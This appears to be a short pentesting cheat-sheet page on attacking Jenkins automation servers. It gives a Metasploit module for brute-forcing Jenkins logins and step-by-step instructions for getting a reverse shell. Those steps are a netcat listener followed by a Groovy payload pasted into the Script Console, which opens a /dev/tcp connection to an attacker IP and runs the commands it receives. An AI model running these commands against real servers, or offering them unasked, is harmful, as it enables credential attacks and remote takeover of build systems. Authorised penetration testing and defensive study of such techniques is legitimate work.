Skip to content

Jenkins Pentesting

Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc.

Brute Force Credentials

msfconsole
msf > use auxiliary/scanner/http/jenkins_login

Reverse Shell on Dashboard

You need to have the credential.

  1. Opening Listener on Your Local Machine
nc -lvnp 4444
  1. Login to Jenkins

Access "http://localhost:8080" in browser and login.

  1. Click "Manage Jenkins" -> "Script Console"

  2. Add the Payload in the Console

r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/<Attacker_IP>/4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
  1. Click "Run"

Then you should get a shell.